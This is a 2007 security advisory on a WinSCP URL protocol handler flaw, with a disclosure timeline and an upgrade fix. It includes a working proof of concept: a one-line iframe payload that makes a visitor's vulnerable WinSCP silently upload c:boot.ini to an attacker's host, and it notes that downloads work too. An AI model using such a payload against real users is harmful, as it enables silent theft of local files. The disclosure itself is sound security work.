‘WinSCP URL Protocol Handler Flaw’

Summary

By default WinSCP installs URL protocol handlers for the scp:// and sftp:// protocols. These could be used by malicious web content to automatically upload any file from the local system to a remote server, or automatically download files from a remote server to the local system.

Since version 3.8.2 there is a sort of protection against this, but this does not stop all forms of attack.’

Credit:

‘The information has been provided by Kender.Security.’


Details

Vulnerable Systems:
 * WinSCP version 4.0.3

Immune Systems:
 * WinSCP version 4.0.4

On a machine you control set up an scp-only account with the username ‘scp’ with any password. Place this on a website: <iframe src=’scp:password@yourhost.com:’ /console /command ‘option confirm off’ ‘put c:boot.ini’ close exit ”/>

This will upload a file to the server when the page is visited by a user with a vulnerable WinSCP installed.

Downloading a file from the server to any location writable by the current user also works.

Solution:
Upgrade to version 4.04 or higher from http://winscp.net/download.php

Disclosure Timeline
24-Jul-2007 Vulnerability reported to Martin Prikryl
25-07-2007 Proposed fix to Martin
31-07-2007 Response from Martin
01-09-2007 Martin confirms fix
02-09-2007 New version done
06-09-2007 WinSCP v4.04 released’

Categories: Windows